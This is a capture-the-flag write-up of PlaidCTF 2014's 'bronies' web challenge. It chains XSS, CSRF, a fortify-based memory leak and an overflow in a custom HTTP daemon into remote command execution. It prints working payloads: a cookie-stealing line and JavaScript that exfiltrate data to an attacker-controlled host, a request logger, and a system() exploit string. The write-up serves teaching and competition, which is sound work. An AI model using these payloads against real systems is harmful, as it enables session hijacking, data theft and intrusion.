PlaidCTF 2014 - bronies (web800)

For PlaidCTF2014, Eindbazen and fail0verflow joined forces as 0xffa, the Final Fail Alliance.
Don't miss out on other write-ups at Eindbazen's site!
bronies
Web (800 pts)
-------------------
We are trying to break into eXtreme Secure  Solutions, where The
Plague works as a system adminstrator.  We have found that their
internal company login page is at
http://portal.essolutions.largestctf.com/. Recon has also revealed
that  The Plague likes to browse this site during work hours:
http://54.196.225.30/ using the username ponyboy2004.  Remember, our
main target is to break into the company portal, *not* the pony site.

Captcha, Ponies & XSS

Alright, The Plague, it’s time for a final blow to the face. This challenge was worth a whopping 800 points and was divided into two parts. We were determined to solve this beast, so here’s how we did it.

The part most people probably had zero problems with was finding an XSS vulnerability on the ponies website. You can send messages to other bronies, and the message field is prone to free-form XSS. You can confirm this by sending a message with some HTML code in the message body to your own account and viewing it. There was one annoyance for every message you wanted to send, though: you had to pass a captcha. Not just any captcha: this one displays a picture of one of the main(?) characters from the My Little Pony series.

Our strategy for passing this captcha was somewhat saddening: keep refreshing until we get the picture for ‘Rarity’, then submit with ‘Rarity’ in the captcha field. I still regret this approach, as we had to keep doing this until the very last step of the bronies challenge. It would have taken only a little effort to automate this with a lookup table that tells us whether we’re dealing with Applejack, Fluttershy, Pinkie Pie or whatever the other ponies are called.

XSS to Memory Corruption

Ok, next we of course tried to attack The Plague’s ponyboy2004 persona in order to steal his cookie. This proved to be easy and we could nab his cookie… but the goal of the challenge is to break into the portal; the ponies website is just a launchpad… So what can we do on the portal site?

The portal page presents us with a login form that sends an HTTP POST to /login.php. There are 3 fields: username, password and OTP. We have none of them. Manually fuzzing these fields a bit yielded an interesting bit of information… if we supply a long value for the OTP field we get some interesting output:

*** stack smashing detected ***: ./checkotp terminated
======= Backtrace: =========
/lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x50)[0xf7540980]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xeb92a)[0xf754092a]
./checkotp[0x8048aa6]

So it looks like there is a buffer overflow in the checkotp binary, which is invoked by the login.php script. This is also the moment we learned that a checkotp binary existed at all. So we proceeded to download it by accessing http://portal.essolutions.largestctf.com/checkotp directly. Can we reliably exploit this buffer overflow? Maybe there are other bugs in checkotp? Was this the intended solution?

If we can exploit checkotp then what good is the ponies website XSS? Many questions. Some members worked on reversing the checkotp binary while others tried to get their creative juices flowing… The checkotp binary basically accepts the three fields on stdin, separated by newlines (0x0a). We tried for a bit to exploit the buffer overflow to get code execution, and RE’d harder to find other usable bugs. Then something clicked: someone recalled a bugtraq posting by Dan Rosenberg.

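This bugtraq post discusses a method to turn fortify into an attacker aid and use it to leak strings into the error output it prints. The “stack smashing detected” message includes the program name, which glibc reads through the argv[0] pointer (that is where the ./checkotp in the output above comes from). If we can manage to overwrite the argv[0] pointer we can leak any string for which we know the address.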

Memory Corruption to XSS

Reversing taught us that there was not much useful “secret” stuff to be leaked here, but what if we leak our own input again? Would that help us? Yes it would! We can then turn this into another XSS vulnerability in login.php to escalate our XSS privileges to another domain from the context of The Plague’s web browser.

From reversing we learned there’s a nice static address at which our input password lives [0x0804a040]. There’s one small catch: it gets memfrob()’d into that buffer. Not a biggie, since all memfrob does is XOR every byte with 0x2a (42 decimal), so it’s only a small hurdle along the way. After some manual fuzzing we found the right position for the argv[0] pointer. We can verify our theory works by doing the following:

$ OVERFLOW=`perl -e 'print "A"x509 . "\x40\xa0\x04\x08";'`
$ URL='http://portal.essolutions.largestctf.com/login.php'
$ curl -d "username=AA&password=ABABBABBB&otp=$OVERFLOW" "$URL"
<body>
<h1>Login status</h1>
<ul>
*** stack smashing detected ***: khkhhkhhh  terminated
======= Backtrace: =========
/lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x50)[0xf7517980]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xeb92a)[0xf751792a]
khkhhkhhh [0x8048aa6]

As you can see our memfrob()’d password string (ABABBABBB->khkhhkhhh) does indeed appear in the output. Time to leverage this fact for another XSS attack, but this time against the portal domain, we’re slowly getting there. >:-)
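
The transformation is easy to reproduce offline. The sketch below re-implements memfrob and the little-endian packing of the argv[0] pointer in JavaScript. The helper names memfrob, packLE32 and toHex are ours for illustration; they are not taken from the checkotp binary.

```javascript
// memfrob(3) XORs every byte with 0x2a (42); applying it twice restores the input.
function memfrob(str) {
    var out = "";
    for (var i = 0; i < str.length; i++) {
        out += String.fromCharCode(str.charCodeAt(i) ^ 0x2a);
    }
    return out;
}

// Pack a 32-bit address as a little-endian byte string, as needed for the
// value that overwrites the argv[0] pointer.
function packLE32(addr) {
    var out = "";
    for (var i = 0; i < 4; i++) {
        out += String.fromCharCode((addr >>> (8 * i)) & 0xff);
    }
    return out;
}

// Render a byte string as space-separated hex for easy eyeballing.
function toHex(str) {
    var parts = [];
    for (var i = 0; i < str.length; i++) {
        var h = str.charCodeAt(i).toString(16);
        parts.push(h.length === 1 ? "0" + h : h);
    }
    return parts.join(" ");
}

console.log(memfrob("ABABBABBB"));        // khkhhkhhh
console.log(toHex(packLE32(0x0804a040))); // 40 a0 04 08
```

Because XOR is its own inverse, the same memfrob function both predicts what the server will print and prepares input that comes out as plain text.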

Ok, let’s set up a CSRF attack against the portal login using some simple HTML and javascript magic:

HTML:

<html>
<body>
<form action="http://portal.essolutions.largestctf.com/login.php" method="post" id="frm">
<input type="hidden" name="username" id="username" value="AA" />
<input type="hidden" name="password" id="password"/>
<input type="hidden" name="otp" id="otp"/>
</form>
<script>
...
</script>
</body>
</html>

Javascript (inserted into script block in the above HTML):

// simple document.getElementById wrapper
function obj(id) {
        return document.getElementById(id);
}

// thanks stackoverflow.com :-)
String.prototype.repeat = function( num ) {
    return new Array( num + 1 ).join( this );
}

// Pointer to memfrob()'d pass [0x0804a040]
frobbed_password = unescape("%40%A0%04%08");

evil_html = "<script\tsrc='http://ourdomain.tld/a.js'></script>";
frobbed_html = "";

for(i = 0; i < evil_html.length; i++) {
        frobbed_html += String.fromCharCode(evil_html.charCodeAt(i) ^ 42);
}

obj('password').value = frobbed_html;
obj('otp').value = "A".repeat(509) + frobbed_password;

// submit the form to conduct the CSRF-to-memcorruption-to-XSS attack
obj('frm').submit();

This page was hosted on our machine as ‘c.html’. To get The Plague to run this HTML code, we submitted a basic XSS on the ponies page in the form of:

<script>document.location='http://ourdomain.tld/c.html';</script>

A small detail of the evil_html payload is that we use a tab "\t" character instead of a regular space. Why? Because 0x20 xor 0x2a (42) = 0x0a, a newline. The checkotp binary gets fed the POST variables on 3 separate lines on stdin, so a frobbed space would end the password line early and throw off the fields that follow, something we don’t want. :-)
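
A quick way to catch this kind of problem before sending anything is to scan the payload for characters whose frobbed form is a newline. The sketch below does just that; newlineHazards is a hypothetical helper name and the two sample payloads are shortened stand-ins for evil_html.

```javascript
// Return the positions in `payload` whose byte becomes a newline (0x0a)
// after XOR with 0x2a, i.e. the ones that would split the stdin line.
function newlineHazards(payload) {
    var bad = [];
    for (var i = 0; i < payload.length; i++) {
        if ((payload.charCodeAt(i) ^ 0x2a) === 0x0a) {
            bad.push({ index: i, char: payload.charAt(i) });
        }
    }
    return bad;
}

console.log(newlineHazards("<script src='x'>").length);  // 1 (the space at index 7)
console.log(newlineHazards("<script\tsrc='x'>").length); // 0
```

Only 0x20 maps to 0x0a under this XOR, so swapping spaces for tabs (or any other whitespace the HTML parser accepts) is enough.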

This way we had an easy payload we could keep copy pasting into the message box whenever we wanted to retrigger it, and edit the HTML/JS code on the server as needed. The second XSS stage we inject into the portal domain is another script tag which will load a.js from our box. Using a.js we were quickly able to steal The Plague’s portal cookie using a simple payload like this:

new Image().src="http://ourdomain.tld/xss/?"+escape(document.cookie);

In /xss we had set up a basic GET/POST logger (yes, in PHP, sorry..):

<?php
$data = "=== REQUEST FROM [".$_SERVER['REMOTE_ADDR']."] ";
$data .= "-> ".date("Y-m-d : H:i:s")."\n";
$data .= "GET:\n".var_export($_GET, true)."\n";
$data .= "POST:\n".var_export($_POST, true)."\n";
$data .= "COOKIE:\n".var_export($_COOKIE, true)."\n";
$data .= "SERVER:\n".var_export($_SERVER, true)."\n\n";

file_put_contents("log.txt", $data, FILE_APPEND);
?>

Basically a simple stub to log as much info as possible about a request, your bog standard XSS-logging-jar, if you will.

This way we were able to retrieve The Plague’s cookie in our XSS logger and hijack his session on the Portal Domain. This gives us the first flag:

$ COOKIE="PHPSESSID=piaeeg5uhhsn7m380ggn0jeoe1"
$ curl -b "$COOKIE" "http://portal.essolutions.largestctf.com"          
<!doctype html>
<html>
    <head>
    <title>
        eXtreme Secure Solutions Internal Portal
    </title>
    </head>
    <link rel="stylesheet" type="text/css" charset="utf-8" media="all" href="/style.css">
    <body>
    <div id="box">
        <h1>eXtreme Secure Solutions Internal Portal</h1>
        <div id="notice">
            Flag #1: xss_problem_is_web_problem<br>
            This challenge has one more flag.  Break into the internal server to capture it!
        </div>
        <p>
            You are logged in as ebleford.
        </p>
        <p>
            Reminder: For security reasons, all internet traffic is blocked on the Bigson.
        </p>
        <p>
<script>
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'http://bigson.essolutions.largestctf.com/status', false);
    xhr.send(null);
    if (xhr.responseJSON["status"] == "ok") {
        document.write('The Bigson is up!');
    } else {
        document.write('The Bigson is down!');
    }
</script>
        </p>
        <ul id="menu">
            <li><a href="http://bigson.essolutions.largestctf.com/index?file=index.html">The Bigson</a></li>
            <li><a href="/logout.php">Logout</a></li>
        </ul>
    </div>
    </body>
</html>

Flag xss_problem_is_web_problem concludes ‘part #1’ of the bronies task, netting us 300 points. Phew.

Attacking the bigson

Alright, we have a way to break into the portal domain now. In the HTML code of the index we find a piece of javascript which sets up an XMLHttpRequest (XHR/AJAX) request to http://bigson.essolutions.largestctf.com/status. There’s also a link to a page on bigson: http://bigson.essolutions.largestctf.com/index?file=index.html. Unfortunately, bigson.essolutions.largestctf.com resolves to an IP address in a private range, so we cannot directly attack the webserver running on that machine. So we did what we have been doing so far once again: leverage The Plague’s web browser to make these requests for us.

$ host bigson.essolutions.largestctf.com
bigson.essolutions.largestctf.com has address 10.15.0.5

We started by writing a new piece of javascript that we could use to exfiltrate responses from the internal bigson webserver back to our internet-facing XSS logger.

function reqListener () {
        new Image().src="http://ourbox.tld/xss?code="+oReq.status;

        var arrayBuffer = oReq.response;
        data="";
        if (arrayBuffer) {
                var byteArray = new Uint8Array(arrayBuffer);
                for (var i = 0; i < byteArray.byteLength; i++) {
                        b = byteArray[i].toString(16);
                        if (b.length==1) b = "0"+b;
                        data += b;
                }

                document.write("<form method=post action=http://ourbox.tld/xss/?data=FORM_TEST id=frm><input type=hidden name=hax value=\"" + data + "\"></form>");
                document.getElementById('frm').submit();
        }

}

var oReq = new XMLHttpRequest();
oReq.onload = reqListener;
oReq.open("get", "http://bigson.essolutions.largestctf.com/status", true);
oReq.responseType = "arraybuffer";
oReq.send(); // without this the request is never actually issued

This code is pretty simple: it sets up an XHR request to http://bigson.essolutions.largestctf.com/status and registers reqListener as the handler that fires once the response has loaded. The reqListener function starts by feeding back the HTTP status code as a GET param to our XSS logger. After that we take the response as an ArrayBuffer, wrap it in a Uint8Array so we can walk over the bytes, and turn it into an ASCII hex string for our convenience. The ASCII hex string is then relayed back to our XSS logger as a POST variable (to avoid the length limitations of the GET query string).
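
On the receiving end the hex string has to be turned back into bytes before it is of any use. A minimal sketch of both directions follows; bytesToHex mirrors the loop in reqListener, while hexToBytes is a hypothetical helper for the logger side and was not part of our original tooling.

```javascript
// Encode a byte array as a lowercase hex string (two digits per byte).
function bytesToHex(bytes) {
    var out = "";
    for (var i = 0; i < bytes.length; i++) {
        var b = bytes[i].toString(16);
        if (b.length === 1) b = "0" + b;
        out += b;
    }
    return out;
}

// Decode a hex string (as found in the "hax" POST field) back into bytes.
function hexToBytes(hex) {
    if (hex.length % 2 !== 0) throw new Error("odd-length hex string");
    var bytes = new Uint8Array(hex.length / 2);
    for (var i = 0; i < bytes.length; i++) {
        bytes[i] = parseInt(hex.substr(2 * i, 2), 16);
    }
    return bytes;
}

// Every ELF file starts with the magic bytes 7f 45 4c 46.
var magic = new Uint8Array([0x7f, 0x45, 0x4c, 0x46]);
console.log(bytesToHex(magic));                      // 7f454c46
console.log(bytesToHex(hexToBytes("7f454c46")));     // 7f454c46
```

Hex doubles the size of the data, but it survives form encoding and logging untouched, which is what matters for binary dumps.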

Of course we quickly started playing around with /index?file=index.html and noticed this endpoint gave us a Local File Disclosure primitive. After dumping /etc/passwd and trying out some guesses for the flag filename we took a deep breath and realized: Yep, they want us to own the internal webserver. Dumping out /proc/self/cmdline taught us where the binary for the webserver lived. Doh, turns out it’s just ./bigson. After refining the exfiltration script a bit (the javascript code you can see above is the “final” version, the first version didn’t handle binary/long data too gracefully ;-)) we managed to dump out the bigson ELF binary.
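
One small gotcha when reading /proc/self/cmdline through such a primitive: the arguments are separated by NUL bytes rather than spaces. A minimal sketch for splitting a dumped cmdline follows. parseCmdline is a hypothetical helper, and the sample bytes are simply the string ./bigson plus a NUL, reconstructed from the description above and not copied from the real dump.

```javascript
// Split the raw contents of /proc/<pid>/cmdline into its arguments.
// Each argument is terminated by a NUL byte.
function parseCmdline(bytes) {
    var args = [];
    var cur = "";
    for (var i = 0; i < bytes.length; i++) {
        if (bytes[i] === 0) {
            args.push(cur);
            cur = "";
        } else {
            cur += String.fromCharCode(bytes[i]);
        }
    }
    if (cur.length > 0) args.push(cur); // tolerate a missing final NUL
    return args;
}

// "./bigson\0" as raw bytes (illustrative sample).
var sampleCmdline = new Uint8Array([0x2e, 0x2f, 0x62, 0x69, 0x67, 0x73, 0x6f, 0x6e, 0x00]);
console.log(parseCmdline(sampleCmdline)); // [ './bigson' ]
```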

It’s time to reverse and pwn this binary at an inhuman speed since there’s only a few hours left before the end of pCTF… Better call in some reinforcements! And who else but a real pony would be fit for such a task? ;-)

Peering in

comex here - this was where I took over. Since reading a fixed filename wasn’t enough to find the flag, I had to exploit bigson.elf to get code execution. I popped it in IDA and, well, it was C++:

...
Dispatcher::Dispatcher(void)
Dispatcher::~Dispatcher()
Dispatcher::Dispatch(int)
Dispatcher::AddHandler(std::string const&,void (*)(std::string const&,HttpRequest const&,HttpResponse *))
std::forward<HashFunction *&>(std::remove_reference<HashFunction *&>::type &)
std::forward<std::default_delete<HashFunction>>(std::remove_reference<std::default_delete<HashFunction>>::type &)
std::_Head_base<1ul,std::default_delete<HashFunction>,true>::_Head_base<std::default_delete<HashFunction>,void>(1ul &&)
...

Thanks to templates and virtual methods, among other things, object code compiled from C++ tends to look ugly and include a lot of indirection. Combined with a binary compiled for x86-64, which the Hex-Rays decompiler is not yet compatible with, this made my first reaction a bit of a groan. But this was misplaced; having full symbols more than makes up for the annoyance. I don’t need to care what the STL function std::_Head_base<1ul,std::default_delete<HashFunction>,true>::_Head_base<std::default_delete<HashFunction>,void>(1ul &&) does if the calls to it are buried inside other library functions with saner names, and when dealing with non-library code, C++ symbols have the advantage over C of containing parameter types. Plus, once I started looking at the code, it became apparent that the binary was compiled with a low optimization level, avoiding inlining and keeping variables in stack slots and other things that made the assembly quite easy to read (at the cost of producing woefully inefficient code).

The outer loop

Anyway, there wasn’t that much functionality, so I went through it all. When the program is started up, it becomes a forking server, with a loop to accept an HTTP connection, fork, and call a drop_privs function before handling the connection. From that, two things stood out:

  1. Since all child processes are forked from a single master process, all memory addresses remain the same between requests. With the ability to ask the program to read /proc/self/maps, ASLR became a non-issue.

  2. I was somewhat suspicious of drop_privs being called after forking, because there is an easy-to-make mistake when dropping privileges: if the return value of setuid wasn’t checked, the process could end up reading files as root rather than the specified user bigson. But the return value is indeed checked, so false alarm.
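
To make the first point concrete: once /proc/self/maps has been dumped through the file read, turning it into usable addresses is a few lines of parsing. The sketch below assumes the standard Linux maps line format (address range, permissions, offset, device, inode, path). The sample mappings and the symbol offset are made up for illustration and are NOT the real bigson layout.

```javascript
// Parse the text of /proc/self/maps into a list of mappings.
// Addresses are kept as BigInt because 64-bit values do not fit in a double.
function parseMaps(text) {
    return text.split("\n").filter(function (line) {
        return line.trim() !== "";
    }).map(function (line) {
        var f = line.trim().split(/\s+/);
        var range = f[0].split("-");
        return {
            start: BigInt("0x" + range[0]),
            end: BigInt("0x" + range[1]),
            perms: f[1],
            path: f.slice(5).join(" ")
        };
    });
}

// Lowest start address of all mappings whose path contains `needle`.
function moduleBase(maps, needle) {
    var base = null;
    maps.forEach(function (m) {
        if (m.path.indexOf(needle) !== -1 && (base === null || m.start < base)) {
            base = m.start;
        }
    });
    return base;
}

// Made-up sample data.
var sampleMaps = [
    "00400000-0040c000 r-xp 00000000 08:01 1111 /home/bigson/bigson",
    "7f0000000000-7f00001a0000 r-xp 00000000 08:01 2222 /lib/x86_64-linux-gnu/libc.so.6",
    "7f00001a0000-7f00003a0000 ---p 001a0000 08:01 2222 /lib/x86_64-linux-gnu/libc.so.6"
].join("\n");

var libcBase = moduleBase(parseMaps(sampleMaps), "libc");
var HYPOTHETICAL_OFFSET = 0x1234n; // placeholder for a symbol's offset inside libc
console.log("0x" + (libcBase + HYPOTHETICAL_OFFSET).toString(16)); // 0x7f0000001234
```

Since every child is forked from the same master, a base address read in one request is still valid in the next one.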

Moving on, the handle function just calls Dispatch(int) on a static instance of Dispatcher. OOP at its best! That method creates an HttpRequest and HttpResponse on the stack, calls ReadFrom(int) (supplying the socket) and Parse() on the HttpRequest, and looks up the Request’s path() in a global std::map to get a function pointer to handle the requested URL. It calls the function with the Response object as an argument, which should fill it out, and finally SendTo on the Response, passing the socket again.

My next step was to look at the available request handlers. However, there were only two: /index, which implements the aforementioned arbitrary file read, and /status, which just returns the fixed JSON data {"status": "ok"}. Both handlers are straightforward, so any further bugs would have to be found in the parsing logic.

Request parsing

Looking at the HttpRequest constructor, it constructs a number of fields: a std::unique_ptr<char []>, three std::strings, a std::map, and a HashTable. The latter was an immediate alarm bell: there have been two uses of std::map so far, yet for one particular field, the author decided to implement their own hash table? Hmm…

But I was going through the logic in order, so first I looked at that ReadFrom method. It’s a standard loop that repeatedly calls recv to receive a total of up to 0x1000 bytes into the aforementioned unique_ptr (which was initialized with a 0x1000 byte buffer), stopping when the buffer is full or \r\n\r\n is found in the input, signifying the end of the HTTP request. With one catch: the check for \r\n\r\n is with strstr, a C library function that expects null terminated strings, yet there is no null termination! If the input data is long enough, strstr could read past the end of the buffer and into whatever is allocated afterwards on the heap. Reading isn’t actually useful, but it’s the start of a pattern of treating the buffer as a C string that continues into the Parse method. That method makes a few calls to strsep, which modifies the string to replace the separator with a null character: without a terminator at the end of the buffer, strsep could seek past it and overwrite some data later in the heap.
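
The strsep problem is easier to see in a toy model. The sketch below treats the heap as one flat byte array and mimics only the part of strsep that matters here: scan from a start position until a NUL byte, and overwrite the first separator found with zero. The 8-byte buffer, the neighbouring data and the function name strsepModel are all invented for illustration; the real buffer is 0x1000 bytes.

```javascript
// Toy model of strsep(3): scan from `start` until a NUL byte, replace the
// first occurrence of `sep` with 0 and return its index, or -1 if none.
function strsepModel(mem, start, sep) {
    for (var i = start; i < mem.length && mem[i] !== 0; i++) {
        if (mem[i] === sep) {
            mem[i] = 0;
            return i;
        }
    }
    return -1;
}

var BUF_SIZE = 8;              // stand-in for the 0x1000-byte request buffer
var heap = new Uint8Array(16); // buffer followed by a neighbouring allocation

// The request fills the whole buffer: no separator and no terminator inside.
for (var i = 0; i < BUF_SIZE; i++) heap[i] = 0x41; // "AAAAAAAA"

// Whatever happens to live right behind the buffer: "hi !" plus a NUL.
heap.set([0x68, 0x69, 0x20, 0x21, 0x00], BUF_SIZE);

var hit = strsepModel(heap, 0, 0x20); // look for a space
console.log(hit);             // 10
console.log(hit >= BUF_SIZE); // true: the zero was written outside the buffer
```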

Unfortunately, at this point, because this read loop is the first time input data is read from the current socket, while fork isolates separate requests, we have no control over the heap layout whatsoever. Plus, changing the first instance of a fixed character in a string to zero is a pretty limited effect: there would have to be no null bytes between the end of the buffer and some important value, the important value would have to contain the character, and changing it to zero would have to do something useful rather than just crashing. It’s possible that the heap was arranged just right to make this work, but I doubted it. So I moved on and searched for other bugs.

The mysterious HashTable

Let’s go back to the HashTable instance. It turns out to be used for query parameters, like /foo?a=b&c=d, while the map is used for HTTP headers. It seems to use a class called PHPHash… what’s that again?

Oh. That hash.

The hash table size seems to be fixed, 0x100 or 0x101, not quite sure; former would make more sense but struct looks like the latter. We can easily tell by checking the part where the implementation reduces the hash modulo the table size, to determine which bucket to use. Where is it?… I can’t find it in HashTable::Lookup, so it has to be built into the hash function: either HashTable::Hash or the method it delegates to, PHPHash::operator(). But there’s no modulo in either of those places! There is no reduction: if the hash is bigger than the table size, it will just index out of bounds. If the program tries to insert a key with such a hash, there will be a wild write.

For normal hash functions, which use shifts and multiplication and the like, this would almost certainly be detected during development, since most keys would happen to hash to large values. But with PHPHash, aka strlen, normal keys will hash to small values which are less than the table size.

What exactly can we do with this? The hash table algorithms are something like (pardon my syntax):

struct HashEntry:
    std::string value
    std::string key
    HashEntry *next

void HashTable::Insert(std::string key, std::string value):
    HashEntry *he = Lookup(key)
    if he == NULL:
        he = this->buckets[Hash(key)] = new HashEntry(key)
    he->value = value

HashEntry *HashTable::Lookup(std::string key):
    bucket = this->buckets[Hash(key)]
    while bucket && bucket->key != key:
        bucket = bucket->next
    return bucket

The HashTable is on the stack, so there are many important stack slots to choose from at fixed offsets, unlike the less predictable heap. However, we can’t just write arbitrary data into the stack; the overflowing buffer is an array of HashEntry *, and before Insert even gets to the writing part, it calls Lookup, which reads the old data and, unless it’s null, calls std::string::operator == on bucket->key. For this not to crash, bucket (the contents of the stack slot) has to be a valid pointer, and operator== can’t crash. For the latter, assuming the usual glibc implementation of strings - the string object consists of a pointer to the string data, and the metadata (length, refcount) is stored at a negative offset in the same buffer - this just means bucket->key (aka *(bucket + 8)) also has to be a valid pointer.

However, most interesting stack slots won’t be zero and probably won’t satisfy this double pointer constraint. Some might remain, but there’s actually a more obvious option than spelunking all the way up the stack.

HashFunction

The hash table is set up to dynamically accept multiple hash functions: even though the constructor always initializes a PHPHash, it stores the pointer into a std::unique_ptr<HashFunction>, a pointer to the superclass, and calls a virtual method to do the actual hashing. This pointer “just so happens” to be stored right after the buckets array at the end of the class layout, and if we overwrite it with a HashEntry, the memory layout will look like:

          Intended                Actual
          --------                -------
bucket    HashFunction *          HashEntry *
deref ->  vtable pointer          std::string value, aka pointer to string contents
deref ->  virtual method pointer  arbitrary data from string

So to have future hash calls jump to an arbitrary address, we just have to put the address at the right offset in the value of our query parameter and make the key exactly 257 bytes long. (By the way, because we can only access this server indirectly, through XMLHttpRequest in an XSSed browser, it might not be possible to stick binary data directly into the HTTP request. But also conveniently, the key and value strings are URL decoded before this point, so we can just use the normal %-escapes.) As ASLR was already defeated, we can pick any address in an executable segment from this binary or any of the libraries that got loaded into its address space.
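
The overwrite itself can be replayed in a small model. The sketch below follows the Insert/Lookup logic described earlier, with the hash function pointer modelled as one extra slot right behind the bucket array. It assumes 0x101 buckets, which matches the 257-byte key but was never fully confirmed; all names are illustrative.

```javascript
var BUCKETS = 0x101; // assumption: 0x101 buckets, so index 257 is the next slot

// Slots 0..256 are buckets; slot 257 stands in for the HashFunction pointer.
function makeTable() {
    var slots = new Array(BUCKETS + 1).fill(null);
    slots[BUCKETS] = { name: "PHPHash" };
    return slots;
}

// The "PHP hash": just the key length, with no reduction modulo the table size.
function phpHash(key) {
    return key.length;
}

function lookup(slots, key) {
    var bucket = slots[phpHash(key)];
    while (bucket && bucket.key !== key) {
        bucket = bucket.next;
    }
    return bucket || null;
}

function insert(slots, key, value) {
    var he = lookup(slots, key);
    if (he === null) {
        he = slots[phpHash(key)] = { value: null, key: key, next: null };
    }
    he.value = value;
}

var table = makeTable();
insert(table, "file", "index.html");      // normal key, lands in bucket 4
insert(table, "A".repeat(257), "attacker-controlled value");

console.log(table[4].value);              // index.html
console.log(table[BUCKETS].name);         // undefined: the PHPHash object is gone
console.log(table[BUCKETS].value);        // attacker-controlled value
```

In the real binary the replaced slot is then dereferenced as a vtable pointer, which is what turns this stray write into control over the next hash call.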

Perhaps system from libc? For this virtual call, rsi, the second argument in the x86-64 calling convention, is a C string containing the key to be hashed - that is, since the hashing for the too-long key is already done before the overwrite, each following key in the request, which can be anything. Nice, but rdi, the first argument, is ‘this’, the HashFunction * a.k.a. HashEntry *; this pointer will start with zeroes, so it’s not a valid C string. I don’t know any libc functions that take a shell command as the second argument, so a bit more work was needed.

Actually, I’m not sure what was expected here; based on the smoothness of the preceding steps, I imagine there might be some elegant function we can jump directly to to do interesting things with the key. In lieu of that, I solved it by finding a simple gadget in libc, which executes the following instructions, among other harmless ones:

  • mov 0x8(%rdi),%rdi: since rdi is HashEntry *, *(rdi + 8) will contain the corresponding key - for the first, overflowing query parameter, not the current one being hashed.
  • callq *0xd8(%rax): rax is not generally well defined on entry to a function, but at that point in bigson.elf, the compiler’s register allocation happens to leave the current key in rax as well as rsi.

So the address to jump to is loaded from the current key, and the first key is used as the first argument. For the former we can now use the address of system, making the latter the command. This constrains the command to be exactly 257 characters long, but there was no need for especially long commands, and comment characters could be used to pad up to 257, so it was suitable.
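
The two building blocks for such a request are a fixed-length command and a %-escaped 64-bit pointer. A minimal sketch of both follows; packLE64Escaped and padCommand are hypothetical helper names, and the address is the one that follows the 216 (0xd8) filler bytes in the exploit at the end of this write-up.

```javascript
// Encode a 64-bit address (BigInt) as eight little-endian %-escaped bytes,
// which the server URL-decodes back into raw pointer bytes.
function packLE64Escaped(addr) {
    var out = "";
    for (var i = 0; i < 8; i++) {
        var b = Number((addr >> BigInt(8 * i)) & 0xffn);
        out += "%" + (b < 16 ? "0" : "") + b.toString(16).toUpperCase();
    }
    return out;
}

// Pad a shell command to exactly `total` characters: " #" starts a comment,
// so the filler that follows is ignored by the shell.
function padCommand(cmd, total) {
    var body = cmd + " #";
    if (body.length > total) throw new Error("command too long");
    while (body.length < total) body += "B";
    return body;
}

console.log(packLE64Escaped(0x7f8b7a629f80n)); // %80%9F%62%7A%8B%7F%00%00
console.log(padCommand("id", 257).length);     // 257
console.log(0xd8);                             // 216, the filler length before the pointer
```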

As soon as we started testing this, Ricky, one of the CTF organizers and author of this challenge, noted on IRC that we were close to solving the puzzle, probably because he saw stderr output from the commands. This was a neat little side channel: we hadn’t gotten the response to work correctly yet (and were running out of time!), but the message all but confirmed that the choice of command was the issue rather than the memory corruption steps.

Last steps

The server did not have any direct Internet access, so it was necessary for this shell command to exfiltrate data via a valid HTTP response issued through the socket. The file descriptor was passed through system to bash, so it was just a matter of echoing a basic HTTP OK (plus the Access-Control-Allow-Origin header) to a specific file descriptor number, echo [etc...] >&4.

Why 4? File descriptors are assigned in order, so the number used for the socket just depends on what operations libc performs. Since I didn’t feel like getting all the libraries to actually run that libc locally (I tested by running the binary with my system’s libc), we just guessed.

I wonder whether the null termination issue was intentional.

Final Exploit

Our final exploit looked more or less like the snippet below. The original final exploit we made was a huge iterative mess, as usually happens when you’re pressed for time during a CTF, so this one was slightly edited to make it a bit more readable. Various commands were tried iteratively, and the fd number used on the server was found using some manual bruteforcing.

function reqListener () {
        new Image().src="http://ourbox.tld/xss?code="+oReq.status;

        var arrayBuffer = oReq.response;
        data="";
        if (arrayBuffer) {
                var byteArray = new Uint8Array(arrayBuffer);
                for (var i = 0; i < byteArray.byteLength; i++) {
                        b = byteArray[i].toString(16);
                        if (b.length==1) b = "0"+b;
                        data += b;
                }

                document.write("<form method=post action=http://ourbox.tld/xss/?data=FORM_TEST id=frm><input type=hidden name=hax value=\"" + data + "\"></form>");
                document.getElementById('frm').submit();
        }

}

String.prototype.repeat = function( num ) {
    return new Array( num + 1 ).join( this );
}

var oReq = new XMLHttpRequest();
oReq.onload = reqListener;
fd_num = "4";

turl = "http://bigson.essolutions.largestctf.com/status?";
cmd = "/bin/echo -en \"HTTP/1.1 200 OK\r\nAccess-Control-Allow-Origin: *\r\n\r\n\" >&"+fd_num+";";
cmd += "cat  /home/bigson/really_weirdly_named_key_haha >&"+fd_num+" #";

query_string = cmd;
query_string += "B".repeat(251 - cmd.length);
query_string += "=ABCDEFGHIJKLMNOPQRSTUVWX";

query_string += "\x44\xc7\x6f\x7a\x8b\x7f\x00\x00"; // 0x7f8b7a6fc744
query_string += "YZ1234567890&" + "C".repeat(216);
query_string += "\x80\x9f\x62\x7a\x8b\x7f\x00\x00"; // 0x7f8b7a629f80
query_string += "=";

oReq.open("get", turl + escape(query_string), true );

oReq.responseType = "arraybuffer";
oReq.send();

And at last WEB_you_hacked_the_bigson_WEB \o/

Closing Words

We hope you enjoyed reading this writeup as much as we enjoyed solving this two-fold task. Never would we have imagined a scenario where you apply XSS to get CSRF, to get memory corruption based XSS, to get access to an internal network where you again can leverage memory corruption against a custom HTTP daemon in order to get to that golden egg: the final flag. Oh, and of course all while maintaining a strategy for data exfiltration which relied solely on sneaking things back out using HTTP requests made by The Plague’s web browser. :-)

Thanks to Ricky (author of the bronies task) and the rest of the PPP team for this amazing task and excellent CTF!